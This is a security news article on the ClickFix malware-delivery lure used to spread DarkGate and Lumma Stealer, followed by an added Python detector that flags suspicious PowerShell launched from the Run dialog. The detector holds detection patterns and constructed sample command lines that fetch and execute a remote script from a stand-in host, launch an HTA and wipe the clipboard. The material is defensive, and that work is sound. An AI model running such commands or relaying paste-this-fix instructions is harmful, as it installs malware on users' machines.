A novel and sophisticated malware delivery method, Clickfix, has recently been uncovered. Threat actors have used it to distribute malware such as DarkGate and Lumma Stealer in countries such as the United States, the United Kingdom, Mexico, Canada, Brazil, Argentina, Peru, Egypt, France, Spain, Portugal, Germany, Italy, India, China, Laos, Australia, Vietnam, and Japan, among others.
This represents a significant evolution in social engineering tactics. It begins when users are enticed to visit seemingly legitimate but compromised websites. Once there, visitors are redirected to domains hosting fake pop-up windows instructing them to paste a script into a PowerShell terminal, a manoeuvre designed to execute malicious activities on their systems.
Researchers identified a phishing email containing an HTML attachment designed to look like a Word document. This HTML file displays an error prompt that tricks users into clicking a ‘How to fix’ button.
Upon further examination, the underlying code revealed several base64-encoded content blocks. Notably, a significant <Title> tag block decodes to a PowerShell command that downloads an HTA (HTML Application) file from a remote server and saves it locally.

“The attackers’ additional instruction to press Windows+R (which opens the Run dialogue) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to convince the user further to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature,” noted researchers. “Once the user does this, the HTA file gets downloaded.”
The downloaded HTA file is executed via the Start-Process cmdlet, initiating harmful actions. The script also clears the clipboard content and terminates the PowerShell session to evade detection. DarkGate then communicates with its command and control (C2) server to continue its malicious operations.
Similarly, Lumma Stealer uses the Clickfix technique to compromise systems. Researchers discovered a website that displayed an error message urging users to follow steps to fix the issue. These steps involve copying a malicious script to the clipboard and executing it in PowerShell.

“McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, designed to deceive users into executing malicious actions,” researchers added.
Upon execution, the script flushes the DNS cache, fetches and executes a script from a remote URL, and clears the screen to hide its activity. The script then downloads and unzips malware, which begins communicating with this C2 server, stealing sensitive information from the infected system.
Researchers have urged users to install antivirus software, implement email and web filtering, deploy network security mechanisms, enforce the principle of least privilege, monitor the clipboard, deploy multi-factor authentication, and ensure all operating systems are up-to-date.
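The behaviours the article describes (an HTA launched via Start-Process, the clipboard wiped, the DNS cache flushed, a remote script fetched and executed, the screen cleared, the session terminated) can be turned into a process-creation detection. The following Python is an added example written for this page, not code from the researchers; the indicator names, weights and the rule that a pasted Run-dialog command has explorer.exe as its parent are my own assumptions, and the log lines are constructed.

```python
import re

# Behaviours the article attributes to ClickFix scripts, as regexes over a
# process command line. Names and the two-hit threshold are assumptions.
INDICATORS = {
    "hta_via_start_process": re.compile(r"start-process\b.*\.hta\b", re.I),
    "clipboard_cleared": re.compile(r"set-clipboard\b|\bclip(\.exe)?\b", re.I),
    "dns_cache_flushed": re.compile(r"ipconfig\s+/flushdns|clear-dnsclientcache", re.I),
    "remote_script_executed": re.compile(
        r"\b(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
        r"|\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b.*\b(iex|invoke-expression)\b",
        re.I),
    "screen_cleared": re.compile(r"\bclear-host\b|(^|[;\s])cls\b", re.I),
    "session_terminated": re.compile(r"(^|[;\s])exit\b|stop-process\b", re.I),
}

def score_command(cmdline):
    """Return the set of ClickFix behaviours present in one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}

def is_clickfix_candidate(parent_image, image, cmdline, min_hits=2):
    """Flag a PowerShell launched from the Run dialog (parent explorer.exe,
    an assumption) whose command line shows at least min_hits behaviours."""
    if not re.search(r"(powershell|pwsh)\.exe$", image, re.I):
        return set()
    if not parent_image.lower().endswith("explorer.exe"):
        return set()
    hits = score_command(cmdline)
    return hits if len(hits) >= min_hits else set()

# Constructed sample events (parent|image|command line), not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    r"C:\Windows\explorer.exe|" + PS + r'|powershell -c "ipconfig /flushdns; iex (irm http://example.invalid/s); cls"',
    r"C:\Windows\explorer.exe|" + PS + r'|powershell -c "Start-Process C:\Users\Public\x.hta; Set-Clipboard -Value $null; exit"',
    r"C:\Windows\explorer.exe|" + PS + r'|powershell -c "Get-ChildItem C:\Temp"',   # benign admin use
    r"C:\Program Files\Vendor\agent.exe|" + PS + r'|powershell -c "ipconfig /flushdns; Clear-Host"',  # not from Run dialog
]

def scan(events):
    """Return [(index, sorted hits)] for events matching the heuristic."""
    findings = []
    for i, line in enumerate(events):
        parent, image, cmd = line.split("|", 2)
        hits = is_clickfix_candidate(parent, image, cmd)
        if hits:
            findings.append((i, sorted(hits)))
    return findings
```

Only the first two constructed events are flagged; the benign directory listing and the flush launched by a management agent are not, which is the trade-off the parent-process rule buys against noise.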
Threat actors have recently been using multiple avenues to distribute DarkGate. Only yesterday, we reported that cybercrooks are using Excel files to spread DarkGate via SMB shares.
In April 2024, it was reported that DarkGate spread to more than thirty countries via novel HTML phishing. Furthermore, in January 2024, it was discovered that Microsoft Teams was used as a gateway for a phishing attack to deliver DarkGate.
Similarly, in January 2024, researchers discovered that YouTube channels were being exploited to distribute Lumma Stealer.